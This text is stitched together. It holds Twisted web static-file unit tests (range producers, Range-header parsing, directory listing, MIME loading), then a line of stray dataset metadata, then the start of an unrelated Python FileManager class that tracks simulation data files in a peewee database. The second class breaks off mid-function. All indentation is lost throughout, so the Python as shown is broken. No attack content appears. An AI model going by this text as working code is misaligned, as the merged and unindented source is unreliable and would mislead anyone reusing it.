def test_resumeProducingProducesContent(self):
"""
L{SingleRangeStaticProducer.resumeProducing} writes the given amount
of content, starting at the given offset, from the resource to the
request.
"""
request = DummyRequest([])
content = b'abcdef'
producer = static.SingleRangeStaticProducer(
request, StringIO(content), 1, 3)
# DummyRequest.registerProducer pulls all output from the producer, so
# we just need to call start.
producer.start()
self.assertEqual(content[1:4], b''.join(request.written))
def test_resumeProducingBuffersOutput(self):
"""
L{SingleRangeStaticProducer.start} writes at most
C{abstract.FileDescriptor.bufferSize} bytes of content from the
resource to the request at once.
"""
request = DummyRequest([])
bufferSize = abstract.FileDescriptor.bufferSize
content = b'abc' * bufferSize
producer = static.SingleRangeStaticProducer(
request, StringIO(content), 1, bufferSize+10)
# DummyRequest.registerProducer pulls all output from the producer, so
# we just need to call start.
producer.start()
expected = [
content[1:bufferSize+1],
content[bufferSize+1:bufferSize+11],
]
self.assertEqual(expected, request.written)
def test_finishCalledWhenDone(self):
"""
L{SingleRangeStaticProducer.resumeProducing} calls finish() on the
request after it is done producing content.
"""
request = DummyRequest([])
finishDeferred = request.notifyFinish()
callbackList = []
finishDeferred.addCallback(callbackList.append)
producer = static.SingleRangeStaticProducer(
request, StringIO(b'abcdef'), 1, 1)
# start calls registerProducer on the DummyRequest, which pulls all
# output from the producer and so we just need this one call.
producer.start()
self.assertEqual([None], callbackList)
class MultipleRangeStaticProducerTests(TestCase):
"""
Tests for L{MultipleRangeStaticProducer}.
"""
def test_implementsIPullProducer(self):
"""
L{MultipleRangeStaticProducer} implements L{IPullProducer}.
"""
verifyObject(
interfaces.IPullProducer,
static.MultipleRangeStaticProducer(None, None, None))
def test_resumeProducingProducesContent(self):
"""
L{MultipleRangeStaticProducer.resumeProducing} writes the requested
chunks of content from the resource to the request, with the supplied
boundaries in between each chunk.
"""
request = DummyRequest([])
content = b'abcdef'
producer = static.MultipleRangeStaticProducer(
request, StringIO(content), [(b'1', 1, 3), (b'2', 5, 1)])
# DummyRequest.registerProducer pulls all output from the producer, so
# we just need to call start.
producer.start()
self.assertEqual(b'1bcd2f', b''.join(request.written))
def test_resumeProducingBuffersOutput(self):
"""
L{MultipleRangeStaticProducer.start} writes about
C{abstract.FileDescriptor.bufferSize} bytes of content from the
resource to the request at once.
To be specific about the 'about' above: it can write slightly more,
for example in the case where the first boundary plus the first chunk
is less than C{bufferSize} but first boundary plus the first chunk
plus the second boundary is more, but this is unimportant as in
practice the boundaries are fairly small. On the other side, it is
important for performance to bundle up several small chunks into one
call to request.write.
"""
request = DummyRequest([])
content = b'0123456789' * 2
producer = static.MultipleRangeStaticProducer(
request, StringIO(content),
[(b'a', 0, 2), (b'b', 5, 10), (b'c', 0, 0)])
producer.bufferSize = 10
# DummyRequest.registerProducer pulls all output from the producer, so
# we just need to call start.
producer.start()
expected = [
b'a' + content[0:2] + b'b' + content[5:11],
content[11:15] + b'c',
]
self.assertEqual(expected, request.written)
def test_finishCalledWhenDone(self):
"""
L{MultipleRangeStaticProducer.resumeProducing} calls finish() on the
request after it is done producing content.
"""
request = DummyRequest([])
finishDeferred = request.notifyFinish()
callbackList = []
finishDeferred.addCallback(callbackList.append)
producer = static.MultipleRangeStaticProducer(
request, StringIO(b'abcdef'), [(b'', 1, 2)])
# start calls registerProducer on the DummyRequest, which pulls all
# output from the producer and so we just need this one call.
producer.start()
self.assertEqual([None], callbackList)
class RangeTests(TestCase):
"""
Tests for I{Range-Header} support in L{twisted.web.static.File}.
@type file: L{file}
@ivar file: Temporary (binary) file containing the content to be served.
@type resource: L{static.File}
@ivar resource: A leaf web resource using C{file} as content.
@type request: L{DummyRequest}
@ivar request: A fake request, requesting C{resource}.
@type catcher: L{list}
@ivar catcher: List which gathers all log information.
"""
def setUp(self):
"""
Create a temporary file with a fixed payload of 64 bytes. Create a
resource for that file and create a request which will be for that
resource. Each test can set a different range header to test different
aspects of the implementation.
"""
path = FilePath(self.mktemp())
# This is just a jumble of random stuff. It's supposed to be a good
# set of data for this test, particularly in order to avoid
# accidentally seeing the right result by having a byte sequence
# repeated at different locations or by having byte values which are
# somehow correlated with their position in the string.
self.payload = (b'\xf8u\xf3E\x8c7\xce\x00\x9e\xb6a0y0S\xf0\xef\xac\xb7'
b'\xbe\xb5\x17M\x1e\x136k{\x1e\xbe\x0c\x07\x07\t\xd0'
b'\xbckY\xf5I\x0b\xb8\x88oZ\x1d\x85b\x1a\xcdk\xf2\x1d'
b'&\xfd%\xdd\x82q/A\x10Y\x8b')
path.setContent(self.payload)
self.file = path.open()
self.resource = static.File(self.file.name)
self.resource.isLeaf = 1
self.request = DummyRequest([b''])
self.request.uri = self.file.name
self.catcher = []
log.addObserver(self.catcher.append)
def tearDown(self):
"""
Clean up the resource file and the log observer.
"""
self.file.close()
log.removeObserver(self.catcher.append)
def _assertLogged(self, expected):
"""
Asserts that a given log message occurred with an expected message.
"""
logItem = self.catcher.pop()
self.assertEqual(logItem["message"][0], expected)
self.assertEqual(
self.catcher, [], "An additional log occurred: %r" % (logItem,))
def test_invalidRanges(self):
"""
L{File._parseRangeHeader} raises L{ValueError} when passed
syntactically invalid byte ranges.
"""
f = self.resource._parseRangeHeader
# there's no =
self.assertRaises(ValueError, f, b'bytes')
# unknown isn't a valid Bytes-Unit
self.assertRaises(ValueError, f, b'unknown=1-2')
# there's no - in =stuff
self.assertRaises(ValueError, f, b'bytes=3')
# both start and end are empty
self.assertRaises(ValueError, f, b'bytes=-')
# start isn't an integer
self.assertRaises(ValueError, f, b'bytes=foo-')
# end isn't an integer
self.assertRaises(ValueError, f, b'bytes=-foo')
# end isn't equal to or greater than start
self.assertRaises(ValueError, f, b'bytes=5-4')
def test_rangeMissingStop(self):
"""
A single bytes range without an explicit stop position is parsed into a
two-tuple giving the start position and L{None}.
"""
self.assertEqual(
self.resource._parseRangeHeader(b'bytes=0-'), [(0, None)])
def test_rangeMissingStart(self):
"""
A single bytes range without an explicit start position is parsed into
a two-tuple of L{None} and the end position.
"""
self.assertEqual(
self.resource._parseRangeHeader(b'bytes=-3'), [(None, 3)])
def test_range(self):
"""
A single bytes range with explicit start and stop positions is parsed
into a two-tuple of those positions.
"""
self.assertEqual(
self.resource._parseRangeHeader(b'bytes=2-5'), [(2, 5)])
def test_rangeWithSpace(self):
"""
A single bytes range with whitespace in allowed places is parsed in
the same way as it would be without the whitespace.
"""
self.assertEqual(
self.resource._parseRangeHeader(b' bytes=1-2 '), [(1, 2)])
self.assertEqual(
self.resource._parseRangeHeader(b'bytes =1-2 '), [(1, 2)])
self.assertEqual(
self.resource._parseRangeHeader(b'bytes= 1-2'), [(1, 2)])
self.assertEqual(
self.resource._parseRangeHeader(b'bytes=1 -2'), [(1, 2)])
self.assertEqual(
self.resource._parseRangeHeader(b'bytes=1- 2'), [(1, 2)])
self.assertEqual(
self.resource._parseRangeHeader(b'bytes=1-2 '), [(1, 2)])
def test_nullRangeElements(self):
"""
If there are multiple byte ranges but only one is non-null, the
non-null range is parsed and its start and stop returned.
"""
self.assertEqual(
self.resource._parseRangeHeader(b'bytes=1-2,\r\n, ,\t'), [(1, 2)])
def test_multipleRanges(self):
"""
If multiple byte ranges are specified their starts and stops are
returned.
"""
self.assertEqual(
self.resource._parseRangeHeader(b'bytes=1-2,3-4'),
[(1, 2), (3, 4)])
def test_bodyLength(self):
"""
A correct response to a range request is as long as the length of the
requested range.
"""
self.request.requestHeaders.addRawHeader(b'range', b'bytes=0-43')
self.resource.render(self.request)
self.assertEqual(len(b''.join(self.request.written)), 44)
def test_invalidRangeRequest(self):
"""
An incorrect range request (RFC 2616 defines a correct range request as
a Bytes-Unit followed by a '=' character followed by a specific range.
Only 'bytes' is defined) results in the range header value being logged
and a normal 200 response being sent.
"""
range = b'foobar=0-43'
self.request.requestHeaders.addRawHeader(b'range', range)
self.resource.render(self.request)
expected = "Ignoring malformed Range header %r" % (range.decode(),)
self._assertLogged(expected)
self.assertEqual(b''.join(self.request.written), self.payload)
self.assertEqual(self.request.responseCode, http.OK)
self.assertEqual(
self.request.responseHeaders.getRawHeaders(b'content-length')[0],
b'%d' % (len(self.payload),))
def parseMultipartBody(self, body, boundary):
"""
Parse C{body} as a multipart MIME response separated by C{boundary}.
Note that this with fail the calling test on certain syntactic
problems.
"""
sep = b"\r\n--" + boundary
parts = body.split(sep)
self.assertEqual(b'', parts[0])
self.assertEqual(b'--\r\n', parts[-1])
parsed_parts = []
for part in parts[1:-1]:
before, header1, header2, blank, partBody = part.split(b'\r\n', 4)
headers = header1 + b'\n' + header2
self.assertEqual(b'', before)
self.assertEqual(b'', blank)
partContentTypeValue = re.search(
b'^content-type: (.*)$', headers, re.I|re.M).group(1)
start, end, size = re.search(
b'^content-range: bytes ([0-9]+)-([0-9]+)/([0-9]+)$',
headers, re.I|re.M).groups()
parsed_parts.append(
{b'contentType': partContentTypeValue,
b'contentRange': (start, end, size),
b'body': partBody})
return parsed_parts
def test_multipleRangeRequest(self):
"""
The response to a request for multiple bytes ranges is a MIME-ish
multipart response.
"""
startEnds = [(0, 2), (20, 30), (40, 50)]
rangeHeaderValue = b','.join([networkString("%s-%s" % (s,e)) for (s, e) in startEnds])
self.request.requestHeaders.addRawHeader(b'range',
b'bytes=' + rangeHeaderValue)
self.resource.render(self.request)
self.assertEqual(self.request.responseCode, http.PARTIAL_CONTENT)
boundary = re.match(
b'^multipart/byteranges; boundary="(.*)"$',
self.request.responseHeaders.getRawHeaders(b'content-type')[0]).group(1)
parts = self.parseMultipartBody(b''.join(self.request.written), boundary)
self.assertEqual(len(startEnds), len(parts))
for part, (s, e) in zip(parts, startEnds):
self.assertEqual(networkString(self.resource.type),
part[b'contentType'])
start, end, size = part[b'contentRange']
self.assertEqual(int(start), s)
self.assertEqual(int(end), e)
self.assertEqual(int(size), self.resource.getFileSize())
self.assertEqual(self.payload[s:e+1], part[b'body'])
def test_multipleRangeRequestWithRangeOverlappingEnd(self):
"""
The response to a request for multiple bytes ranges is a MIME-ish
multipart response, even when one of the ranged falls off the end of
the resource.
"""
startEnds = [(0, 2), (40, len(self.payload) + 10)]
rangeHeaderValue = b','.join([networkString("%s-%s" % (s,e)) for (s, e) in startEnds])
self.request.requestHeaders.addRawHeader(b'range',
b'bytes=' + rangeHeaderValue)
self.resource.render(self.request)
self.assertEqual(self.request.responseCode, http.PARTIAL_CONTENT)
boundary = re.match(
b'^multipart/byteranges; boundary="(.*)"$',
self.request.responseHeaders.getRawHeaders(b'content-type')[0]).group(1)
parts = self.parseMultipartBody(b''.join(self.request.written), boundary)
self.assertEqual(len(startEnds), len(parts))
for part, (s, e) in zip(parts, startEnds):
self.assertEqual(networkString(self.resource.type),
part[b'contentType'])
start, end, size = part[b'contentRange']
self.assertEqual(int(start), s)
self.assertEqual(int(end), min(e, self.resource.getFileSize()-1))
self.assertEqual(int(size), self.resource.getFileSize())
self.assertEqual(self.payload[s:e+1], part[b'body'])
def test_implicitEnd(self):
"""
If the end byte position is omitted, then it is treated as if the
length of the resource was specified by the end byte position.
"""
self.request.requestHeaders.addRawHeader(b'range', b'bytes=23-')
self.resource.render(self.request)
self.assertEqual(b''.join(self.request.written), self.payload[23:])
self.assertEqual(len(b''.join(self.request.written)), 41)
self.assertEqual(self.request.responseCode, http.PARTIAL_CONTENT)
self.assertEqual(
self.request.responseHeaders.getRawHeaders(b'content-range')[0],
b'bytes 23-63/64')
self.assertEqual(
self.request.responseHeaders.getRawHeaders(b'content-length')[0],
b'41')
def test_implicitStart(self):
"""
If the start byte position is omitted but the end byte position is
supplied, then the range is treated as requesting the last -N bytes of
the resource, where N is the end byte position.
"""
self.request.requestHeaders.addRawHeader(b'range', b'bytes=-17')
self.resource.render(self.request)
self.assertEqual(b''.join(self.request.written), self.payload[-17:])
self.assertEqual(len(b''.join(self.request.written)), 17)
self.assertEqual(self.request.responseCode, http.PARTIAL_CONTENT)
self.assertEqual(
self.request.responseHeaders.getRawHeaders(b'content-range')[0],
b'bytes 47-63/64')
self.assertEqual(
self.request.responseHeaders.getRawHeaders(b'content-length')[0],
b'17')
def test_explicitRange(self):
"""
A correct response to a bytes range header request from A to B starts
with the A'th byte and ends with (including) the B'th byte. The first
byte of a page is numbered with 0.
"""
self.request.requestHeaders.addRawHeader(b'range', b'bytes=3-43')
self.resource.render(self.request)
written = b''.join(self.request.written)
self.assertEqual(written, self.payload[3:44])
self.assertEqual(self.request.responseCode, http.PARTIAL_CONTENT)
self.assertEqual(
self.request.responseHeaders.getRawHeaders(b'content-range')[0],
b'bytes 3-43/64')
self.assertEqual(
b'%d' % (len(written),),
self.request.responseHeaders.getRawHeaders(b'content-length')[0])
def test_explicitRangeOverlappingEnd(self):
"""
A correct response to a bytes range header request from A to B when B
is past the end of the resource starts with the A'th byte and ends
with the last byte of the resource. The first byte of a page is
numbered with 0.
"""
self.request.requestHeaders.addRawHeader(b'range', b'bytes=40-100')
self.resource.render(self.request)
written = b''.join(self.request.written)
self.assertEqual(written, self.payload[40:])
self.assertEqual(self.request.responseCode, http.PARTIAL_CONTENT)
self.assertEqual(
self.request.responseHeaders.getRawHeaders(b'content-range')[0],
b'bytes 40-63/64')
self.assertEqual(
b'%d' % (len(written),),
self.request.responseHeaders.getRawHeaders(b'content-length')[0])
def test_statusCodeRequestedRangeNotSatisfiable(self):
"""
If a range is syntactically invalid due to the start being greater than
the end, the range header is ignored (the request is responded to as if
it were not present).
"""
self.request.requestHeaders.addRawHeader(b'range', b'bytes=20-13')
self.resource.render(self.request)
self.assertEqual(self.request.responseCode, http.OK)
self.assertEqual(b''.join(self.request.written), self.payload)
self.assertEqual(
self.request.responseHeaders.getRawHeaders(b'content-length')[0],
b'%d' % (len(self.payload),))
def test_invalidStartBytePos(self):
"""
If a range is unsatisfiable due to the start not being less than the
length of the resource, the response is 416 (Requested range not
satisfiable) and no data is written to the response body (RFC 2616,
section 14.35.1).
"""
self.request.requestHeaders.addRawHeader(b'range', b'bytes=67-108')
self.resource.render(self.request)
self.assertEqual(
self.request.responseCode, http.REQUESTED_RANGE_NOT_SATISFIABLE)
self.assertEqual(b''.join(self.request.written), b'')
self.assertEqual(
self.request.responseHeaders.getRawHeaders(b'content-length')[0],
b'0')
# Sections 10.4.17 and 14.16
self.assertEqual(
self.request.responseHeaders.getRawHeaders(b'content-range')[0],
networkString('bytes */%d' % (len(self.payload),)))
class DirectoryListerTests(TestCase):
"""
Tests for L{static.DirectoryLister}.
"""
def _request(self, uri):
request = DummyRequest([b''])
request.uri = uri
return request
def test_renderHeader(self):
"""
L{static.DirectoryLister} prints the request uri as header of the
rendered content.
"""
path = FilePath(self.mktemp())
path.makedirs()
lister = static.DirectoryLister(path.path)
data = lister.render(self._request(b'foo'))
self.assertIn(b"<h1>Directory listing for foo</h1>", data)
self.assertIn(b"<title>Directory listing for foo</title>", data)
def test_renderUnquoteHeader(self):
"""
L{static.DirectoryLister} unquote the request uri before printing it.
"""
path = FilePath(self.mktemp())
path.makedirs()
lister = static.DirectoryLister(path.path)
data = lister.render(self._request(b'foo%20bar'))
self.assertIn(b"<h1>Directory listing for foo bar</h1>", data)
self.assertIn(b"<title>Directory listing for foo bar</title>", data)
def test_escapeHeader(self):
"""
L{static.DirectoryLister} escape "&", "<" and ">" after unquoting the
request uri.
"""
path = FilePath(self.mktemp())
path.makedirs()
lister = static.DirectoryLister(path.path)
data = lister.render(self._request(b'foo%26bar'))
self.assertIn(b"<h1>Directory listing for foo&bar</h1>", data)
self.assertIn(b"<title>Directory listing for foo&bar</title>", data)
def test_renderFiles(self):
"""
L{static.DirectoryLister} is able to list all the files inside a
directory.
"""
path = FilePath(self.mktemp())
path.makedirs()
path.child('file1').setContent(b"content1")
path.child('file2').setContent(b"content2" * 1000)
lister = static.DirectoryLister(path.path)
data = lister.render(self._request(b'foo'))
body = b"""<tr class="odd">
<td><a href="file1">file1</a></td>
<td>8B</td>
<td>[text/html]</td>
<td></td>
</tr>
<tr class="even">
<td><a href="file2">file2</a></td>
<td>7K</td>
<td>[text/html]</td>
<td></td>
</tr>"""
self.assertIn(body, data)
def test_renderDirectories(self):
"""
L{static.DirectoryLister} is able to list all the directories inside
a directory.
"""
path = FilePath(self.mktemp())
path.makedirs()
path.child('dir1').makedirs()
path.child('dir2 & 3').makedirs()
lister = static.DirectoryLister(path.path)
data = lister.render(self._request(b'foo'))
body = b"""<tr class="odd">
<td><a href="dir1/">dir1/</a></td>
<td></td>
<td>[Directory]</td>
<td></td>
</tr>
<tr class="even">
<td><a href="dir2%20%26%203/">dir2 & 3/</a></td>
<td></td>
<td>[Directory]</td>
<td></td>
</tr>"""
self.assertIn(body, data)
def test_renderFiltered(self):
"""
L{static.DirectoryLister} takes an optional C{dirs} argument that
filter out the list of directories and files printed.
"""
path = FilePath(self.mktemp())
path.makedirs()
path.child('dir1').makedirs()
path.child('dir2').makedirs()
path.child('dir3').makedirs()
lister = static.DirectoryLister(path.path, dirs=["dir1", "dir3"])
data = lister.render(self._request(b'foo'))
body = b"""<tr class="odd">
<td><a href="dir1/">dir1/</a></td>
<td></td>
<td>[Directory]</td>
<td></td>
</tr>
<tr class="even">
<td><a href="dir3/">dir3/</a></td>
<td></td>
<td>[Directory]</td>
<td></td>
</tr>"""
self.assertIn(body, data)
def test_oddAndEven(self):
"""
L{static.DirectoryLister} gives an alternate class for each odd and
even rows in the table.
"""
lister = static.DirectoryLister(None)
elements = [{"href": "", "text": "", "size": "", "type": "",
"encoding": ""} for i in range(5)]
content = lister._buildTableContent(elements)
self.assertEqual(len(content), 5)
self.assertTrue(content[0].startswith('<tr class="odd">'))
self.assertTrue(content[1].startswith('<tr class="even">'))
self.assertTrue(content[2].startswith('<tr class="odd">'))
self.assertTrue(content[3].startswith('<tr class="even">'))
self.assertTrue(content[4].startswith('<tr class="odd">'))
def test_contentType(self):
"""
L{static.DirectoryLister} produces a MIME-type that indicates that it is
HTML, and includes its charset (UTF-8).
"""
path = FilePath(self.mktemp())
path.makedirs()
lister = static.DirectoryLister(path.path)
req = self._request(b'')
lister.render(req)
self.assertEqual(req.responseHeaders.getRawHeaders(b'content-type')[0],
b"text/html; charset=utf-8")
def test_mimeTypeAndEncodings(self):
"""
L{static.DirectoryLister} is able to detect mimetype and encoding of
listed files.
"""
path = FilePath(self.mktemp())
path.makedirs()
path.child('file1.txt').setContent(b"file1")
path.child('file2.py').setContent(b"python")
path.child('file3.conf.gz').setContent(b"conf compressed")
path.child('file4.diff.bz2').setContent(b"diff compressed")
directory = os.listdir(path.path)
directory.sort()
contentTypes = {
".txt": "text/plain",
".py": "text/python",
".conf": "text/configuration",
".diff": "text/diff"
}
lister = static.DirectoryLister(path.path, contentTypes=contentTypes)
dirs, files = lister._getFilesAndDirectories(directory)
self.assertEqual(dirs, [])
self.assertEqual(files, [
{'encoding': '',
'href': 'file1.txt',
'size': '5B',
'text': 'file1.txt',
'type': '[text/plain]'},
{'encoding': '',
'href': 'file2.py',
'size': '6B',
'text': 'file2.py',
'type': '[text/python]'},
{'encoding': '[gzip]',
'href': 'file3.conf.gz',
'size': '15B',
'text': 'file3.conf.gz',
'type': '[text/configuration]'},
{'encoding': '[bzip2]',
'href': 'file4.diff.bz2',
'size': '15B',
'text': 'file4.diff.bz2',
'type': '[text/diff]'}])
@skipIf(not platform._supportsSymlinks(), "No symlink support")
def test_brokenSymlink(self):
"""
If on the file in the listing points to a broken symlink, it should not
be returned by L{static.DirectoryLister._getFilesAndDirectories}.
"""
path = FilePath(self.mktemp())
path.makedirs()
file1 = path.child('file1')
file1.setContent(b"file1")
file1.linkTo(path.child("file2"))
file1.remove()
lister = static.DirectoryLister(path.path)
directory = os.listdir(path.path)
directory.sort()
dirs, files = lister._getFilesAndDirectories(directory)
self.assertEqual(dirs, [])
self.assertEqual(files, [])
def test_childrenNotFound(self):
"""
Any child resource of L{static.DirectoryLister} renders an HTTP
I{NOT FOUND} response code.
"""
path = FilePath(self.mktemp())
path.makedirs()
lister = static.DirectoryLister(path.path)
request = self._request(b'')
child = resource.getChildForRequest(lister, request)
result = _render(child, request)
def cbRendered(ignored):
self.assertEqual(request.responseCode, http.NOT_FOUND)
result.addCallback(cbRendered)
return result
def test_repr(self):
"""
L{static.DirectoryLister.__repr__} gives the path of the lister.
"""
path = FilePath(self.mktemp())
lister = static.DirectoryLister(path.path)
self.assertEqual(repr(lister),
"<DirectoryLister of %r>" % (path.path,))
self.assertEqual(str(lister),
"<DirectoryLister of %r>" % (path.path,))
def test_formatFileSize(self):
"""
L{static.formatFileSize} format an amount of bytes into a more readable
format.
"""
self.assertEqual(static.formatFileSize(0), "0B")
self.assertEqual(static.formatFileSize(123), "123B")
self.assertEqual(static.formatFileSize(4567), "4K")
self.assertEqual(static.formatFileSize(8900000), "8M")
self.assertEqual(static.formatFileSize(1234000000), "1G")
self.assertEqual(static.formatFileSize(1234567890000), "1149G")
class LoadMimeTypesTests(TestCase):
"""
Tests for the MIME type loading routine.
@cvar UNSET: A sentinel to signify that C{self.paths} has not been set by
the mock init.
"""
UNSET = object()
def setUp(self):
self.paths = self.UNSET
def _fakeInit(self, paths):
"""
A mock L{mimetypes.init} that records the value of the passed C{paths}
argument.
@param paths: The paths that will be recorded.
"""
self.paths = paths
def test_defaultArgumentIsNone(self):
"""
By default, L{None} is passed to C{mimetypes.init}.
"""
static.loadMimeTypes(init=self._fakeInit)
self.assertIdentical(self.paths, None)
def test_extraLocationsWork(self):
"""
Passed MIME type files are passed to C{mimetypes.init}.
"""
paths = ["x", "y", "z"]
static.loadMimeTypes(paths, init=self._fakeInit)
self.assertIdentical(self.paths, paths)
def test_usesGlobalInitFunction(self):
"""
By default, C{mimetypes.init} is called.
"""
# Checking mimetypes.inited doesn't always work, because
# something, somewhere, calls mimetypes.init. Yay global
# mutable state :)
if getattr(inspect, "signature", None):
signature = inspect.signature(static.loadMimeTypes)
self.assertIs(signature.parameters["init"].default,
mimetypes.init)
else:
args, _, _, defaults = inspect.getargspec(static.loadMimeTypes)
defaultInit = defaults[args.index("init")]
self.assertIs(defaultInit, mimetypes.init)
class StaticDeprecationTests(TestCase):
def test_addSlashDeprecated(self):
"""
L{twisted.web.static.addSlash} is deprecated.
"""
from twisted.web.static import addSlash
addSlash(DummyRequest([b'']))
warnings = self.flushWarnings([self.test_addSlashDeprecated])
self.assertEqual(len(warnings), 1)
self.assertEqual(warnings[0]['message'],
"twisted.web.static.addSlash was deprecated in Twisted 16.0.0")
| 36.635332 | 102 | 0.617383 | [
"MIT",
"Unlicense"
] | ikingye/twisted | src/twisted/web/test/test_static.py | 67,812 | Python |
import os
import re
import sys
import threading
import logging
import random
from time import sleep
from peewee import *
from enum import IntEnum
from threading import Thread
from models import DataFile
from lib.jobstatus import JobStatus
from lib.util import print_debug
from lib.util import print_line
from lib.util import print_message
class FileStatus(IntEnum):
PRESENT = 0
NOT_PRESENT = 1
IN_TRANSIT = 2
class FileManager(object):
"""
Manage all files required by jobs
"""
def __init__(self, event_list, config, database='processflow.db'):
"""
Parameters:
database (str): the path to where to create the sqlite database file
config (dict): the global configuration dict
"""
self._event_list = event_list
self._db_path = database
self._config = config
if os.path.exists(database):
os.remove(database)
DataFile._meta.database.init(database)
if DataFile.table_exists():
DataFile.drop_table()
DataFile.create_table()
self.thread_list = list()
self.kill_event = threading.Event()
def __str__(self):
# TODO: make this better
return str({
'db_path': self._db_path,
})
def get_endpoints(self):
"""
Return a list of globus endpoints for all cases
"""
q = (DataFile
.select()
.where(
DataFile.transfer_type == 'globus'))
endpoints = list()
for x in q.execute():
if x.remote_uuid not in endpoints:
endpoints.append(x.remote_uuid)
return endpoints
def write_database(self):
"""
Write out a human readable version of the database for debug purposes
"""
file_list_path = os.path.join(
self._config['global']['project_path'],
'output',
'file_list.txt')
with open(file_list_path, 'w') as fp:
try:
for case in self._config['simulations']:
if case in ['start_year', 'end_year', 'comparisons']:
continue
fp.write('+++++++++++++++++++++++++++++++++++++++++++++')
fp.write('\n\t{case}\t\n'.format(case=case))
fp.write('+++++++++++++++++++++++++++++++++++++++++++++\n')
q = (DataFile
.select(DataFile.datatype)
.where(DataFile.case == case)
.distinct())
for df_type in q.execute():
_type = df_type.datatype
fp.write('===================================\n')
fp.write('\t' + _type + ':\n')
datafiles = (DataFile
.select()
.where(
(DataFile.datatype == _type) &
(DataFile.case == case)))
for datafile in datafiles.execute():
filestr = '-------------------------------------'
filestr += '\n\t name: ' + datafile.name + '\n\t local_status: '
if datafile.local_status == 0:
filestr += ' present, '
elif datafile.local_status == 1:
filestr += ' missing, '
else:
filestr += ' in transit, '
filestr += '\n\t remote_status: '
if datafile.remote_status == 0:
filestr += ' present'
elif datafile.remote_status == 1:
filestr += ' missing'
else:
filestr += ' in transit'
filestr += '\n\t local_size: ' + \
str(datafile.local_size)
filestr += '\n\t local_path: ' + datafile.local_path
filestr += '\n\t remote_path: ' + datafile.remote_path
filestr += '\n\t year: ' + str(datafile.year)
filestr += '\n\t month: ' + str(datafile.month) + '\n'
fp.write(filestr)
except Exception as e:
print_debug(e)
def check_data_ready(self, data_required, case, start_year=None, end_year=None):
try:
for datatype in data_required:
if start_year and end_year:
q = (DataFile
.select()
.where(
(DataFile.year >= start_year) &
(DataFile.year <= end_year) &
(DataFile.case == case) &
(DataFile.datatype == datatype)))
else:
q = (DataFile
.select()
.where(
(DataFile.case == case) &
(DataFile.datatype == datatype)))
datafiles = q.execute()
for df in datafiles:
if not os.path.exists(df.local_path) and df.local_status == FileStatus.PRESENT.value:
df.local_status = FileStatus.NOT_PRESENT.value
df.save()
elif os.path.exists(df.local_path) and df.local_status == FileStatus.NOT_PRESENT.value:
df.local_status = FileStatus.PRESENT.value
df.save()
if df.local_status != FileStatus.PRESENT.value:
return False
return True
except Exception as e:
print_debug(e)
def render_file_string(self, data_type, data_type_option, case, year=None, month=None):
"""
Takes strings from the data_types dict and replaces the keywords with the appropriate values
"""
# setup the replacement dict
start_year = int(self._config['simulations']['start_year'])
end_year = int(self._config['simulations']['end_year'])
replace = {
'PROJECT_PATH': self._config['global']['project_path'],
'REMOTE_PATH': self._config['simulations'][case].get('remote_path', ''),
'CASEID': case,
'REST_YR': '{:04d}'.format(start_year + 1),
'START_YR': '{:04d}'.format(start_year),
'END_YR': '{:04d}'.format(end_year),
'LOCAL_PATH': self._config['simulations'][case].get('local_path', '')
}
if year is not None:
replace['YEAR'] = '{:04d}'.format(year)
if month is not None:
replace['MONTH'] = '{:02d}'.format(month)
if self._config['data_types'][data_type].get(case):
if self._config['data_types'][data_type][case].get(data_type_option):
instring = self._config['data_types'][data_type][case][data_type_option]
for item in self._config['simulations'][case]:
if item.upper() in self._config['data_types'][data_type][case][data_type_option]:
instring = instring.replace(item.upper(), self._config['simulations'][case][item])
return instring
instring = self._config['data_types'][data_type][data_type_option]
for string, val in replace.items():
if string in instring:
instring = instring.replace(string, val)
return instring
def populate_file_list(self):
"""
Populate the database with the required DataFile entries
"""
msg = 'Creating file table'
print_line(
line=msg,
event_list=self._event_list)
newfiles = list()
start_year = int(self._config['simulations']['start_year'])
end_year = int(self._config['simulations']['end_year'])
with DataFile._meta.database.atomic():
# for each case
for case in self._config['simulations']:
if case in ['start_year', 'end_year', 'comparisons']:
continue
# for each data type
for _type in self._config['data_types']:
data_types_for_case = self._config['simulations'][case]['data_types']
if 'all' not in data_types_for_case:
if _type not in data_types_for_case:
continue
# setup the base local_path
local_path = self.render_file_string(
data_type=_type,
data_type_option='local_path',
case=case)
new_files = list()
if self._config['data_types'][_type].get('monthly') and self._config['data_types'][_type]['monthly'] in ['True', 'true', '1', 1]:
# handle monthly data
for year in range(start_year, end_year + 1):
for month in range(1, 13):
filename = self.render_file_string(
data_type=_type,
data_type_option='file_format',
case=case,
year=year,
month=month)
r_path = self.render_file_string(
data_type=_type,
data_type_option='remote_path',
case=case,
year=year,
month=month)
new_files.append({
'name': filename,
'remote_path': os.path.join(r_path, filename),
'local_path': os.path.join(local_path, filename),
'local_status': FileStatus.NOT_PRESENT.value,
'case': case,
'remote_status': FileStatus.NOT_PRESENT.value,
'year': year,
'month': month,
'datatype': _type,
'local_size': 0,
'transfer_type': self._config['simulations'][case]['transfer_type'],
'remote_uuid': self._config['simulations'][case].get('remote_uuid', ''),
'remote_hostname': self._config['simulations'][case].get('remote_hostname', '')
})
else:
# handle one-off data
filename = self.render_file_string(
data_type=_type,
data_type_option='file_format',
case=case)
r_path = self.render_file_string(
data_type=_type,
data_type_option='remote_path',
case=case)
new_files.append({
'name': filename,
'remote_path': os.path.join(r_path, filename),
'local_path': os.path.join(local_path, filename),
'local_status': FileStatus.NOT_PRESENT.value,
'case': case,
'remote_status': FileStatus.NOT_PRESENT.value,
'year': 0,
'month': 0,
'datatype': _type,
'local_size': 0,
'transfer_type': self._config['simulations'][case]['transfer_type'],
'remote_uuid': self._config['simulations'][case].get('remote_uuid', ''),
'remote_hostname': self._config['simulations'][case].get('remote_hostname', '')
})
tail, _ = os.path.split(new_files[0]['local_path'])
if not os.path.exists(tail):
os.makedirs(tail)
step = 50
for idx in range(0, len(new_files), step):
DataFile.insert_many(
new_files[idx: idx + step]).execute()
msg = 'Database update complete'
print_line(msg, self._event_list)
def verify_remote_files(self, client, case):
"""
Check that the user supplied file paths are valid for remote files
Parameters:
client: either an ssh_client or a globus_client
case: the case to check remote paths for
"""
if not self._config['global']['verify']:
return True
msg = 'verifying remote file paths'
print_line(msg, self._event_list)
data_types_to_verify = []
q = (DataFile
.select()
.where(
(DataFile.case == case) &
(DataFile.local_status != FileStatus.PRESENT.value)))
for datafile in q.execute():
if datafile.datatype not in data_types_to_verify:
data_types_to_verify.append(datafile.datatype)
found_all = True
for datatype in data_types_to_verify:
q = (DataFile
.select()
.where(
(DataFile.case == case) &
(DataFile.datatype == datatype)))
files = q.execute()
